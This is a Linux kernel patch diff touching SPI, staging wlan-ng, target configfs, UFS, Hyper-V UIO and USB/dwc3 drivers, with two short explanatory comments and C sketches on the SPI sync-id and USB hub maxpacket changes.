+ 
+ 	n = readl_relaxed(spi_engine->base + SPI_ENGINE_REG_SDO_FIFO_ROOM);
+-	while (n && spi_engine->tx_length) {
+-		m = min(n, spi_engine->tx_length);
+-		buf = spi_engine->tx_buf;
++	while (n && st->tx_length) {
++		m = min(n, st->tx_length);
++		buf = st->tx_buf;
+ 		for (i = 0; i < m; i++)
+ 			writel_relaxed(buf[i], addr);
+-		spi_engine->tx_buf += m;
+-		spi_engine->tx_length -= m;
++		st->tx_buf += m;
++		st->tx_length -= m;
+ 		n -= m;
+-		if (spi_engine->tx_length == 0)
++		if (st->tx_length == 0)
+ 			spi_engine_tx_next(spi_engine);
+ 	}
+ 
+-	return spi_engine->tx_length != 0;
++	return st->tx_length != 0;
+ }
+ 
+ static bool spi_engine_read_rx_fifo(struct spi_engine *spi_engine)
+ {
+ 	void __iomem *addr = spi_engine->base + SPI_ENGINE_REG_SDI_DATA_FIFO;
++	struct spi_engine_message_state *st = spi_engine->msg->state;
+ 	unsigned int n, m, i;
+ 	uint8_t *buf;
+ 
+ 	n = readl_relaxed(spi_engine->base + SPI_ENGINE_REG_SDI_FIFO_LEVEL);
+-	while (n && spi_engine->rx_length) {
+-		m = min(n, spi_engine->rx_length);
+-		buf = spi_engine->rx_buf;
++	while (n && st->rx_length) {
++		m = min(n, st->rx_length);
++		buf = st->rx_buf;
+ 		for (i = 0; i < m; i++)
+ 			buf[i] = readl_relaxed(addr);
+-		spi_engine->rx_buf += m;
+-		spi_engine->rx_length -= m;
++		st->rx_buf += m;
++		st->rx_length -= m;
+ 		n -= m;
+-		if (spi_engine->rx_length == 0)
++		if (st->rx_length == 0)
+ 			spi_engine_rx_next(spi_engine);
+ 	}
+ 
+-	return spi_engine->rx_length != 0;
++	return st->rx_length != 0;
+ }
+ 
+ static irqreturn_t spi_engine_irq(int irq, void *devid)
+ {
+-	struct spi_master *master = devid;
+-	struct spi_engine *spi_engine = spi_master_get_devdata(master);
++	struct spi_controller *host = devid;
++	struct spi_engine *spi_engine = spi_controller_get_devdata(host);
+ 	unsigned int disable_int = 0;
+ 	unsigned int pending;
+ 
+@@ -387,16 +402,20 @@ static irqreturn_t spi_engine_irq(int irq, void *devid)
+ 			disable_int |= SPI_ENGINE_INT_SDI_ALMOST_FULL;
+ 	}
+ 
+-	if (pending & SPI_ENGINE_INT_SYNC) {
+-		if (spi_engine->msg &&
+-		    spi_engine->completed_id == spi_engine->sync_id) {
++	if (pending & SPI_ENGINE_INT_SYNC && spi_engine->msg) {
++		struct spi_engine_message_state *st = spi_engine->msg->state;
++
++		if (spi_engine->completed_id == st->sync_id) {
+ 			struct spi_message *msg = spi_engine->msg;
++			struct spi_engine_message_state *st = msg->state;
+ 
+-			kfree(spi_engine->p);
++			ida_free(&spi_engine->sync_ida, st->sync_id);
++			kfree(st->p);
++			kfree(st);
+ 			msg->status = 0;
+ 			msg->actual_length = msg->frame_length;
+ 			spi_engine->msg = NULL;
+-			spi_finalize_current_message(master);
++			spi_finalize_current_message(host);
+ 			disable_int |= SPI_ENGINE_INT_SYNC;
+ 		}
+ 	}
+@@ -412,34 +431,51 @@ static irqreturn_t spi_engine_irq(int irq, void *devid)
+ 	return IRQ_HANDLED;
+ }
+ 
+-static int spi_engine_transfer_one_message(struct spi_master *master,
++static int spi_engine_transfer_one_message(struct spi_controller *host,
+ 	struct spi_message *msg)
+ {
+ 	struct spi_engine_program p_dry, *p;
+-	struct spi_engine *spi_engine = spi_master_get_devdata(master);
++	struct spi_engine *spi_engine = spi_controller_get_devdata(host);
++	struct spi_engine_message_state *st;
+ 	unsigned int int_enable = 0;
+ 	unsigned long flags;
+ 	size_t size;
++	int ret;
++
++	st = kzalloc(sizeof(*st), GFP_KERNEL);
++	if (!st)
++		return -ENOMEM;
+ 
+ 	p_dry.length = 0;
+ 	spi_engine_compile_message(spi_engine, msg, true, &p_dry);
+ 
+ 	size = sizeof(*p->instructions) * (p_dry.length + 1);
+ 	p = kzalloc(sizeof(*p) + size, GFP_KERNEL);
+-	if (!p)
++	if (!p) {
++		kfree(st);
+ 		return -ENOMEM;
++	}
++
++	ret = ida_alloc_range(&spi_engine->sync_ida, 0, U8_MAX, GFP_KERNEL);
++	if (ret < 0) {
++		kfree(p);
++		kfree(st);
++		return ret;
++	}
++
++	st->sync_id = ret;
++
+ 	spi_engine_compile_message(spi_engine, msg, false, p);
+ 
+ 	spin_lock_irqsave(&spi_engine->lock, flags);
+-	spi_engine->sync_id = (spi_engine->sync_id + 1) & 0xff;
+-	spi_engine_program_add_cmd(p, false,
+-		SPI_ENGINE_CMD_SYNC(spi_engine->sync_id));
++	spi_engine_program_add_cmd(p, false, SPI_ENGINE_CMD_SYNC(st->sync_id));
+ 
++	msg->state = st;
+ 	spi_engine->msg = msg;
+-	spi_engine->p = p;
++	st->p = p;
+ 
+-	spi_engine->cmd_buf = p->instructions;
+-	spi_engine->cmd_length = p->length;
++	st->cmd_buf = p->instructions;
++	st->cmd_length = p->length;
+ 	if (spi_engine_write_cmd_fifo(spi_engine))
+ 		int_enable |= SPI_ENGINE_INT_CMD_ALMOST_EMPTY;
+ 
+@@ -448,7 +484,7 @@ static int spi_engine_transfer_one_message(struct spi_master *master,
+ 		int_enable |= SPI_ENGINE_INT_SDO_ALMOST_EMPTY;
+ 
+ 	spi_engine_rx_next(spi_engine);
+-	if (spi_engine->rx_length != 0)
++	if (st->rx_length != 0)
+ 		int_enable |= SPI_ENGINE_INT_SDI_ALMOST_FULL;
+ 
+ 	int_enable |= SPI_ENGINE_INT_SYNC;
+@@ -464,7 +500,7 @@ static int spi_engine_transfer_one_message(struct spi_master *master,
+ static int spi_engine_probe(struct platform_device *pdev)
+ {
+ 	struct spi_engine *spi_engine;
+-	struct spi_master *master;
++	struct spi_controller *host;
+ 	unsigned int version;
+ 	int irq;
+ 	int ret;
+@@ -473,107 +509,76 @@ static int spi_engine_probe(struct platform_device *pdev)
+ 	if (irq <= 0)
+ 		return -ENXIO;
+ 
+-	spi_engine = devm_kzalloc(&pdev->dev, sizeof(*spi_engine), GFP_KERNEL);
+-	if (!spi_engine)
+-		return -ENOMEM;
+-
+-	master = spi_alloc_master(&pdev->dev, 0);
+-	if (!master)
++	host = devm_spi_alloc_host(&pdev->dev, sizeof(*spi_engine));
++	if (!host)
+ 		return -ENOMEM;
+ 
+-	spi_master_set_devdata(master, spi_engine);
++	spi_engine = spi_controller_get_devdata(host);
+ 
+ 	spin_lock_init(&spi_engine->lock);
++	ida_init(&spi_engine->sync_ida);
+ 
+-	spi_engine->clk = devm_clk_get(&pdev->dev, "s_axi_aclk");
+-	if (IS_ERR(spi_engine->clk)) {
+-		ret = PTR_ERR(spi_engine->clk);
+-		goto err_put_master;
+-	}
+-
+-	spi_engine->ref_clk = devm_clk_get(&pdev->dev, "spi_clk");
+-	if (IS_ERR(spi_engine->ref_clk)) {
+-		ret = PTR_ERR(spi_engine->ref_clk);
+-		goto err_put_master;
+-	}
++	spi_engine->clk = devm_clk_get_enabled(&pdev->dev, "s_axi_aclk");
++	if (IS_ERR(spi_engine->clk))
++		return PTR_ERR(spi_engine->clk);
+ 
+-	ret = clk_prepare_enable(spi_engine->clk);
+-	if (ret)
+-		goto err_put_master;
+-
+-	ret = clk_prepare_enable(spi_engine->ref_clk);
+-	if (ret)
+-		goto err_clk_disable;
++	spi_engine->ref_clk = devm_clk_get_enabled(&pdev->dev, "spi_clk");
++	if (IS_ERR(spi_engine->ref_clk))
++		return PTR_ERR(spi_engine->ref_clk);
+ 
+ 	spi_engine->base = devm_platform_ioremap_resource(pdev, 0);
+-	if (IS_ERR(spi_engine->base)) {
+-		ret = PTR_ERR(spi_engine->base);
+-		goto err_ref_clk_disable;
+-	}
+-
+-	version = readl(spi_engine->base + SPI_ENGINE_REG_VERSION);
+-	if (SPI_ENGINE_VERSION_MAJOR(version) != 1) {
+-		dev_err(&pdev->dev, "Unsupported peripheral version %u.%u.%c\n",
+-			SPI_ENGINE_VERSION_MAJOR(version),
+-			SPI_ENGINE_VERSION_MINOR(version),
+-			SPI_ENGINE_VERSION_PATCH(version));
+-		ret = -ENODEV;
+-		goto err_ref_clk_disable;
++	if (IS_ERR(spi_engine->base))
++		return PTR_ERR(spi_engine->base);
++
++	version = readl(spi_engine->base + ADI_AXI_REG_VERSION);
++	if (ADI_AXI_PCORE_VER_MAJOR(version) != 1) {
++		dev_err(&pdev->dev, "Unsupported peripheral version %u.%u.%u\n",
++			ADI_AXI_PCORE_VER_MAJOR(version),
++			ADI_AXI_PCORE_VER_MINOR(version),
++			ADI_AXI_PCORE_VER_PATCH(version));
++		return -ENODEV;
+ 	}
+ 
+ 	writel_relaxed(0x00, spi_engine->base + SPI_ENGINE_REG_RESET);
+ 	writel_relaxed(0xff, spi_engine->base + SPI_ENGINE_REG_INT_PENDING);
+ 	writel_relaxed(0x00, spi_engine->base + SPI_ENGINE_REG_INT_ENABLE);
+ 
+-	ret = request_irq(irq, spi_engine_irq, 0, pdev->name, master);
++	ret = request_irq(irq, spi_engine_irq, 0, pdev->name, host);
+ 	if (ret)
+-		goto err_ref_clk_disable;
++		return ret;
+ 
+-	master->dev.of_node = pdev->dev.of_node;
+-	master->mode_bits = SPI_CPOL | SPI_CPHA | SPI_3WIRE;
+-	master->bits_per_word_mask = SPI_BPW_MASK(8);
+-	master->max_speed_hz = clk_get_rate(spi_engine->ref_clk) / 2;
+-	master->transfer_one_message = spi_engine_transfer_one_message;
+-	master->num_chipselect = 8;
++	host->dev.of_node = pdev->dev.of_node;
++	host->mode_bits = SPI_CPOL | SPI_CPHA | SPI_3WIRE;
++	host->bits_per_word_mask = SPI_BPW_MASK(8);
++	host->max_speed_hz = clk_get_rate(spi_engine->ref_clk) / 2;
++	host->transfer_one_message = spi_engine_transfer_one_message;
++	host->num_chipselect = 8;
+ 
+-	ret = spi_register_master(master);
++	ret = spi_register_controller(host);
+ 	if (ret)
+ 		goto err_free_irq;
+ 
+-	platform_set_drvdata(pdev, master);
++	platform_set_drvdata(pdev, host);
+ 
+ 	return 0;
+ err_free_irq:
+-	free_irq(irq, master);
+-err_ref_clk_disable:
+-	clk_disable_unprepare(spi_engine->ref_clk);
+-err_clk_disable:
+-	clk_disable_unprepare(spi_engine->clk);
+-err_put_master:
+-	spi_master_put(master);
++	free_irq(irq, host);
+ 	return ret;
+ }
+ 
+-static int spi_engine_remove(struct platform_device *pdev)
++static void spi_engine_remove(struct platform_device *pdev)
+ {
+-	struct spi_master *master = spi_master_get(platform_get_drvdata(pdev));
+-	struct spi_engine *spi_engine = spi_master_get_devdata(master);
++	struct spi_controller *host = platform_get_drvdata(pdev);
++	struct spi_engine *spi_engine = spi_controller_get_devdata(host);
+ 	int irq = platform_get_irq(pdev, 0);
+ 
+-	spi_unregister_master(master);
+-
+-	free_irq(irq, master);
++	spi_unregister_controller(host);
+ 
+-	spi_master_put(master);
++	free_irq(irq, host);
+ 
+ 	writel_relaxed(0xff, spi_engine->base + SPI_ENGINE_REG_INT_PENDING);
+ 	writel_relaxed(0x00, spi_engine->base + SPI_ENGINE_REG_INT_ENABLE);
+ 	writel_relaxed(0x01, spi_engine->base + SPI_ENGINE_REG_RESET);
+-
+-	clk_disable_unprepare(spi_engine->ref_clk);
+-	clk_disable_unprepare(spi_engine->clk);
+-
+-	return 0;
+ }
+ 
+ static const struct of_device_id spi_engine_match_table[] = {
+@@ -584,7 +589,7 @@ MODULE_DEVICE_TABLE(of, spi_engine_match_table);
+ 
+ static struct platform_driver spi_engine_driver = {
+ 	.probe = spi_engine_probe,
+-	.remove = spi_engine_remove,
++	.remove_new = spi_engine_remove,
+ 	.driver = {
+ 		.name = "spi-engine",
+ 		.of_match_table = spi_engine_match_table,
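The spi-axi-spi-engine rework above moves per-message bookkeeping into spi_message->state and draws each message's sync_id from an IDA (ida_alloc_range(..., 0, U8_MAX, ...)) instead of a wrapping counter, so a SYNC interrupt can be matched to its message unambiguously. A minimal standalone sketch of such an id allocator, with a bitmap standing in for the kernel's IDA:

#include <stdio.h>

static unsigned long used;	/* ids 0..63 for brevity; the driver uses 0..255 */

static int id_alloc(void)
{
	for (int i = 0; i < 64; i++)
		if (!(used & (1UL << i))) {
			used |= 1UL << i;
			return i;
		}
	return -1;	/* pool exhausted */
}

static void id_free(int id)
{
	used &= ~(1UL << id);
}

int main(void)
{
	int a = id_alloc(), b = id_alloc();

	printf("%d %d\n", a, b);	/* 0 1 */
	id_free(a);
	printf("%d\n", id_alloc());	/* 0 is reused, never handed out twice */
	id_free(b);
	return 0;
}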
+diff --git a/drivers/spi/spi-hisi-kunpeng.c b/drivers/spi/spi-hisi-kunpeng.c
+index 525cc0143a305..54730e93fba45 100644
+--- a/drivers/spi/spi-hisi-kunpeng.c
++++ b/drivers/spi/spi-hisi-kunpeng.c
+@@ -151,8 +151,6 @@ static const struct debugfs_reg32 hisi_spi_regs[] = {
+ 	HISI_SPI_DBGFS_REG("ENR", HISI_SPI_ENR),
+ 	HISI_SPI_DBGFS_REG("FIFOC", HISI_SPI_FIFOC),
+ 	HISI_SPI_DBGFS_REG("IMR", HISI_SPI_IMR),
+-	HISI_SPI_DBGFS_REG("DIN", HISI_SPI_DIN),
+-	HISI_SPI_DBGFS_REG("DOUT", HISI_SPI_DOUT),
+ 	HISI_SPI_DBGFS_REG("SR", HISI_SPI_SR),
+ 	HISI_SPI_DBGFS_REG("RISR", HISI_SPI_RISR),
+ 	HISI_SPI_DBGFS_REG("ISR", HISI_SPI_ISR),
+diff --git a/drivers/spi/spi-microchip-core-qspi.c b/drivers/spi/spi-microchip-core-qspi.c
+index 19a6a46829f6d..620c5d19031e2 100644
+--- a/drivers/spi/spi-microchip-core-qspi.c
++++ b/drivers/spi/spi-microchip-core-qspi.c
+@@ -283,6 +283,7 @@ static int mchp_coreqspi_setup_clock(struct mchp_coreqspi *qspi, struct spi_devi
+ 	}
+ 
+ 	control = readl_relaxed(qspi->regs + REG_CONTROL);
++	control &= ~CONTROL_CLKRATE_MASK;
+ 	control |= baud_rate_val << CONTROL_CLKRATE_SHIFT;
+ 	writel_relaxed(control, qspi->regs + REG_CONTROL);
+ 	control = readl_relaxed(qspi->regs + REG_CONTROL);
+diff --git a/drivers/spi/spi.c b/drivers/spi/spi.c
+index 19688f333e0bc..1018feff468c9 100644
+--- a/drivers/spi/spi.c
++++ b/drivers/spi/spi.c
+@@ -2774,6 +2774,17 @@ int spi_slave_abort(struct spi_device *spi)
+ }
+ EXPORT_SYMBOL_GPL(spi_slave_abort);
+ 
++int spi_target_abort(struct spi_device *spi)
++{
++	struct spi_controller *ctlr = spi->controller;
++
++	if (spi_controller_is_target(ctlr) && ctlr->target_abort)
++		return ctlr->target_abort(ctlr);
++
++	return -ENOTSUPP;
++}
++EXPORT_SYMBOL_GPL(spi_target_abort);
++
+ static ssize_t slave_show(struct device *dev, struct device_attribute *attr,
+ 			  char *buf)
+ {
+@@ -4206,6 +4217,7 @@ static int __spi_sync(struct spi_device *spi, struct spi_message *message)
+ 		wait_for_completion(&done);
+ 		status = message->status;
+ 	}
++	message->complete = NULL;
+ 	message->context = NULL;
+ 
+ 	return status;
+diff --git a/drivers/staging/wlan-ng/hfa384x_usb.c b/drivers/staging/wlan-ng/hfa384x_usb.c
+index 02fdef7a16c87..c7cd54171d994 100644
+--- a/drivers/staging/wlan-ng/hfa384x_usb.c
++++ b/drivers/staging/wlan-ng/hfa384x_usb.c
+@@ -1116,8 +1116,8 @@ static int hfa384x_usbctlx_complete_sync(struct hfa384x *hw,
+ 		if (ctlx == get_active_ctlx(hw)) {
+ 			spin_unlock_irqrestore(&hw->ctlxq.lock, flags);
+ 
+-			del_singleshot_timer_sync(&hw->reqtimer);
+-			del_singleshot_timer_sync(&hw->resptimer);
++			del_timer_sync(&hw->reqtimer);
++			del_timer_sync(&hw->resptimer);
+ 			hw->req_timer_done = 1;
+ 			hw->resp_timer_done = 1;
+ 			usb_kill_urb(&hw->ctlx_urb);
+diff --git a/drivers/staging/wlan-ng/prism2usb.c b/drivers/staging/wlan-ng/prism2usb.c
+index e13da7fadffff..c13f1699e5a2f 100644
+--- a/drivers/staging/wlan-ng/prism2usb.c
++++ b/drivers/staging/wlan-ng/prism2usb.c
+@@ -170,9 +170,9 @@ static void prism2sta_disconnect_usb(struct usb_interface *interface)
+ 		 */
+ 		prism2sta_ifstate(wlandev, P80211ENUM_ifstate_disable);
+ 
+-		del_singleshot_timer_sync(&hw->throttle);
+-		del_singleshot_timer_sync(&hw->reqtimer);
+-		del_singleshot_timer_sync(&hw->resptimer);
++		del_timer_sync(&hw->throttle);
++		del_timer_sync(&hw->reqtimer);
++		del_timer_sync(&hw->resptimer);
+ 
+ 		/* Unlink all the URBs. This "removes the wheels"
+ 		 * from the entire CTLX handling mechanism.
+diff --git a/drivers/target/target_core_configfs.c b/drivers/target/target_core_configfs.c
+index 416514c5c7acd..1a26dd0d56662 100644
+--- a/drivers/target/target_core_configfs.c
++++ b/drivers/target/target_core_configfs.c
+@@ -3587,6 +3587,8 @@ static int __init target_core_init_configfs(void)
+ {
+ 	struct configfs_subsystem *subsys = &target_core_fabrics;
+ 	struct t10_alua_lu_gp *lu_gp;
++	struct cred *kern_cred;
++	const struct cred *old_cred;
+ 	int ret;
+ 
+ 	pr_debug("TARGET_CORE[0]: Loading Generic Kernel Storage"
+@@ -3663,11 +3665,21 @@ static int __init target_core_init_configfs(void)
+ 	if (ret < 0)
+ 		goto out;
+ 
++	/* We use the kernel credentials to access the target directory */
++	kern_cred = prepare_kernel_cred(&init_task);
++	if (!kern_cred) {
++		ret = -ENOMEM;
++		goto out;
++	}
++	old_cred = override_creds(kern_cred);
+ 	target_init_dbroot();
++	revert_creds(old_cred);
++	put_cred(kern_cred);
+ 
+ 	return 0;
+ 
+ out:
++	target_xcopy_release_pt();
+ 	configfs_unregister_subsystem(subsys);
+ 	core_dev_release_virtual_lun0();
+ 	rd_module_exit();
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index f3c25467e571f..948449a13247c 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -9044,7 +9044,10 @@ static int __ufshcd_wl_suspend(struct ufs_hba *hba, enum ufs_pm_op pm_op)
+ 
+ 	/* UFS device & link must be active before we enter in this function */
+ 	if (!ufshcd_is_ufs_dev_active(hba) || !ufshcd_is_link_active(hba)) {
+-		ret = -EINVAL;
++		/* Wait for the error handler to finish, or trigger error recovery */
++		if (!ufshcd_eh_in_progress(hba))
++			ufshcd_force_error_recovery(hba);
++		ret = -EBUSY;
+ 		goto enable_scaling;
+ 	}
+ 
+diff --git a/drivers/uio/uio_hv_generic.c b/drivers/uio/uio_hv_generic.c
+index c08a6cfd119f2..e5789dfcaff61 100644
+--- a/drivers/uio/uio_hv_generic.c
++++ b/drivers/uio/uio_hv_generic.c
+@@ -181,12 +181,14 @@ hv_uio_cleanup(struct hv_device *dev, struct hv_uio_private_data *pdata)
+ {
+ 	if (pdata->send_gpadl.gpadl_handle) {
+ 		vmbus_teardown_gpadl(dev->channel, &pdata->send_gpadl);
+-		vfree(pdata->send_buf);
++		if (!pdata->send_gpadl.decrypted)
++			vfree(pdata->send_buf);
+ 	}
+ 
+ 	if (pdata->recv_gpadl.gpadl_handle) {
+ 		vmbus_teardown_gpadl(dev->channel, &pdata->recv_gpadl);
+-		vfree(pdata->recv_buf);
++		if (!pdata->recv_gpadl.decrypted)
++			vfree(pdata->recv_buf);
+ 	}
+ }
+ 
+@@ -295,7 +297,8 @@ hv_uio_probe(struct hv_device *dev,
+ 	ret = vmbus_establish_gpadl(channel, pdata->recv_buf,
+ 				    RECV_BUFFER_SIZE, &pdata->recv_gpadl);
+ 	if (ret) {
+-		vfree(pdata->recv_buf);
++		if (!pdata->recv_gpadl.decrypted)
++			vfree(pdata->recv_buf);
+ 		goto fail_close;
+ 	}
+ 
+@@ -317,7 +320,8 @@ hv_uio_probe(struct hv_device *dev,
+ 	ret = vmbus_establish_gpadl(channel, pdata->send_buf,
+ 				    SEND_BUFFER_SIZE, &pdata->send_gpadl);
+ 	if (ret) {
+-		vfree(pdata->send_buf);
++		if (!pdata->send_gpadl.decrypted)
++			vfree(pdata->send_buf);
+ 		goto fail_close;
+ 	}
+ 
+diff --git a/drivers/usb/core/hub.c b/drivers/usb/core/hub.c
+index dea110241ee71..50a5608c204f4 100644
+--- a/drivers/usb/core/hub.c
++++ b/drivers/usb/core/hub.c
+@@ -5069,9 +5069,10 @@ hub_port_init(struct usb_hub *hub, struct usb_device *udev, int port1,
+ 	}
+ 	if (usb_endpoint_maxp(&udev->ep0.desc) == i) {
+ 		;	/* Initial ep0 maxpacket guess is right */
+-	} else if ((udev->speed == USB_SPEED_FULL ||
++	} else if (((udev->speed == USB_SPEED_FULL ||
+ 				udev->speed == USB_SPEED_HIGH) &&
+-			(i == 8 || i == 16 || i == 32 || i == 64)) {
++			(i == 8 || i == 16 || i == 32 || i == 64)) ||
++			(udev->speed >= USB_SPEED_SUPER && i > 0)) {
+ 		/* Initial guess is wrong; use the descriptor's value */
+ 		if (udev->speed == USB_SPEED_FULL)
+ 			dev_dbg(&udev->dev, "ep0 maxpacket = %d\n", i);
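The hub.c hunk above widens the ep0 maxpacket sanity check: full/high speed still require one of 8/16/32/64, but for SuperSpeed and faster devices any non-zero descriptor value is now accepted in place of the initial guess. A standalone sketch of the widened predicate (the enum values are illustrative, not the kernel's):

#include <stdbool.h>
#include <stdio.h>

enum speed { FULL, HIGH, SUPER };	/* illustrative subset, ordered by speed */

static bool accept_descriptor_maxp(enum speed s, int maxp)
{
	if ((s == FULL || s == HIGH) &&
	    (maxp == 8 || maxp == 16 || maxp == 32 || maxp == 64))
		return true;
	/* New case: trust any non-zero value reported by a SuperSpeed device. */
	return s >= SUPER && maxp > 0;
}

int main(void)
{
	printf("HS 64:  %d\n", accept_descriptor_maxp(HIGH, 64));	/* 1 */
	printf("SS 512: %d\n", accept_descriptor_maxp(SUPER, 512));	/* 1 */
	printf("HS 100: %d\n", accept_descriptor_maxp(HIGH, 100));	/* 0 */
	return 0;
}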
+diff --git a/drivers/usb/core/port.c b/drivers/usb/core/port.c
+index 93a63b7f164d1..0007031fad0de 100644
+--- a/drivers/usb/core/port.c
++++ b/drivers/usb/core/port.c
+@@ -23,13 +23,15 @@ static ssize_t disable_show(struct device *dev,
+ 	struct usb_port *port_dev = to_usb_port(dev);
+ 	struct usb_device *hdev = to_usb_device(dev->parent->parent);
+ 	struct usb_hub *hub = usb_hub_to_struct_hub(hdev);
+-	struct usb_interface *intf = to_usb_interface(hub->intfdev);
++	struct usb_interface *intf = to_usb_interface(dev->parent);
+ 	int port1 = port_dev->portnum;
+ 	u16 portstatus, unused;
+ 	bool disabled;
+ 	int rc;
+ 	struct kernfs_node *kn;
+ 
++	if (!hub)
++		return -ENODEV;
+ 	hub_get(hub);
+ 	rc = usb_autopm_get_interface(intf);
+ 	if (rc < 0)
+@@ -73,12 +75,14 @@ static ssize_t disable_store(struct device *dev, struct device_attribute *attr,
+ 	struct usb_port *port_dev = to_usb_port(dev);
+ 	struct usb_device *hdev = to_usb_device(dev->parent->parent);
+ 	struct usb_hub *hub = usb_hub_to_struct_hub(hdev);
+-	struct usb_interface *intf = to_usb_interface(hub->intfdev);
++	struct usb_interface *intf = to_usb_interface(dev->parent);
+ 	int port1 = port_dev->portnum;
+ 	bool disabled;
+ 	int rc;
+ 	struct kernfs_node *kn;
+ 
++	if (!hub)
++		return -ENODEV;
+ 	rc = strtobool(buf, &disabled);
+ 	if (rc)
+ 		return rc;
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 011a3909f9ad1..3b5482621e5e0 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -104,6 +104,27 @@ static int dwc3_get_dr_mode(struct dwc3 *dwc)
+ 	return 0;
+ }
+ 
++void dwc3_enable_susphy(struct dwc3 *dwc, bool enable)
++{
++	u32 reg;
++
++	reg = dwc3_readl(dwc->regs, DWC3_GUSB3PIPECTL(0));
++	if (enable && !dwc->dis_u3_susphy_quirk)
++		reg |= DWC3_GUSB3PIPECTL_SUSPHY;
++	else
++		reg &= ~DWC3_GUSB3PIPECTL_SUSPHY;
++
++	dwc3_writel(dwc->regs, DWC3_GUSB3PIPECTL(0), reg);
++
++	reg = dwc3_readl(dwc->regs, DWC3_GUSB2PHYCFG(0));
++	if (enable && !dwc->dis_u2_susphy_quirk)
++		reg |= DWC3_GUSB2PHYCFG_SUSPHY;
++	else
++		reg &= ~DWC3_GUSB2PHYCFG_SUSPHY;
++
++	dwc3_writel(dwc->regs, DWC3_GUSB2PHYCFG(0), reg);
++}
++
+ void dwc3_set_prtcap(struct dwc3 *dwc, u32 mode)
+ {
+ 	u32 reg;
+@@ -669,11 +690,8 @@ static int dwc3_core_ulpi_init(struct dwc3 *dwc)
+  */
+ static int dwc3_phy_setup(struct dwc3 *dwc)
+ {
+-	unsigned int hw_mode;
+ 	u32 reg;
+ 
+-	hw_mode = DWC3_GHWPARAMS0_MODE(dwc->hwparams.hwparams0);
+-
+ 	reg = dwc3_readl(dwc->regs, DWC3_GUSB3PIPECTL(0));
+ 
+ 	/*
+@@ -683,21 +701,16 @@ static int dwc3_phy_setup(struct dwc3 *dwc)
+ 	reg &= ~DWC3_GUSB3PIPECTL_UX_EXIT_PX;
+ 
+ 	/*
+-	 * Above 1.94a, it is recommended to set DWC3_GUSB3PIPECTL_SUSPHY
+-	 * to '0' during coreConsultant configuration. So default value
+-	 * will be '0' when the core is reset. Application needs to set it
+-	 * to '1' after the core initialization is completed.
+-	 */
+-	if (!DWC3_VER_IS_WITHIN(DWC3, ANY, 194A))
+-		reg |= DWC3_GUSB3PIPECTL_SUSPHY;
+-
+-	/*
+-	 * For DRD controllers, GUSB3PIPECTL.SUSPENDENABLE must be cleared after
+-	 * power-on reset, and it can be set after core initialization, which is
+-	 * after device soft-reset during initialization.
++	 * Above DWC_usb3.0 1.94a, it is recommended to set
++	 * DWC3_GUSB3PIPECTL_SUSPHY to '0' during coreConsultant configuration.
++	 * So the default value will be '0' when the core is reset. The application
++	 * needs to set it to '1' after the core initialization is completed.
++	 *
++	 * Similarly for DRD controllers, GUSB3PIPECTL.SUSPENDENABLE must be
++	 * cleared after power-on reset, and it can be set after core
++	 * initialization.
+ 	 */
+-	if (hw_mode == DWC3_GHWPARAMS0_MODE_DRD)
+-		reg &= ~DWC3_GUSB3PIPECTL_SUSPHY;
++	reg &= ~DWC3_GUSB3PIPECTL_SUSPHY;
+ 
+ 	if (dwc->u2ss_inp3_quirk)
+ 		reg |= DWC3_GUSB3PIPECTL_U2SSINP3OK;
+@@ -723,9 +736,6 @@ static int dwc3_phy_setup(struct dwc3 *dwc)
+ 	if (dwc->tx_de_emphasis_quirk)
+ 		reg |= DWC3_GUSB3PIPECTL_TX_DEEPH(dwc->tx_de_emphasis);
+ 
+-	if (dwc->dis_u3_susphy_quirk)
+-		reg &= ~DWC3_GUSB3PIPECTL_SUSPHY;
+-
+ 	if (dwc->dis_del_phy_power_chg_quirk)
+ 		reg &= ~DWC3_GUSB3PIPECTL_DEPOCHANGE;
+ 
+@@ -773,24 +783,15 @@ static int dwc3_phy_setup(struct dwc3 *dwc)
+ 	}
+ 
+ 	/*
+-	 * Above 1.94a, it is recommended to set DWC3_GUSB2PHYCFG_SUSPHY to
+-	 * '0' during coreConsultant configuration. So default value will
+-	 * be '0' when the core is reset. Application needs to set it to
+-	 * '1' after the core initialization is completed.
+-	 */
+-	if (!DWC3_VER_IS_WITHIN(DWC3, ANY, 194A))
+-		reg |= DWC3_GUSB2PHYCFG_SUSPHY;
+-
+-	/*
+-	 * For DRD controllers, GUSB2PHYCFG.SUSPHY must be cleared after
+-	 * power-on reset, and it can be set after core initialization, which is
+-	 * after device soft-reset during initialization.
++	 * Above DWC_usb3.0 1.94a, it is recommended to set
++	 * DWC3_GUSB2PHYCFG_SUSPHY to '0' during coreConsultant configuration.
++	 * So the default value will be '0' when the core is reset. The application
++	 * needs to set it to '1' after the core initialization is completed.
++	 *
++	 * Similarly for DRD controllers, GUSB2PHYCFG.SUSPHY must be cleared
++	 * after power-on reset, and it can be set after core initialization.
+ 	 */
+-	if (hw_mode == DWC3_GHWPARAMS0_MODE_DRD)
+-		reg &= ~DWC3_GUSB2PHYCFG_SUSPHY;
+-
+-	if (dwc->dis_u2_susphy_quirk)
+-		reg &= ~DWC3_GUSB2PHYCFG_SUSPHY;
++	reg &= ~DWC3_GUSB2PHYCFG_SUSPHY;
+ 
+ 	if (dwc->dis_enblslpm_quirk)
+ 		reg &= ~DWC3_GUSB2PHYCFG_ENBLSLPM;
+@@ -1238,21 +1239,6 @@ static int dwc3_core_init(struct dwc3 *dwc)
+ 	if (ret)
+ 		goto err1;
+ 
+-	if (hw_mode == DWC3_GHWPARAMS0_MODE_DRD &&
+-	    !DWC3_VER_IS_WITHIN(DWC3, ANY, 194A)) {
+-		if (!dwc->dis_u3_susphy_quirk) {
+-			reg = dwc3_readl(dwc->regs, DWC3_GUSB3PIPECTL(0));
+-			reg |= DWC3_GUSB3PIPECTL_SUSPHY;
+-			dwc3_writel(dwc->regs, DWC3_GUSB3PIPECTL(0), reg);
+-		}
+-
+-		if (!dwc->dis_u2_susphy_quirk) {
+-			reg = dwc3_readl(dwc->regs, DWC3_GUSB2PHYCFG(0));
+-			reg |= DWC3_GUSB2PHYCFG_SUSPHY;
+-			dwc3_writel(dwc->regs, DWC3_GUSB2PHYCFG(0), reg);
+-		}
+-	}
+-
+ 	dwc3_core_setup_global_control(dwc);
+ 	dwc3_core_num_eps(dwc);
+ 
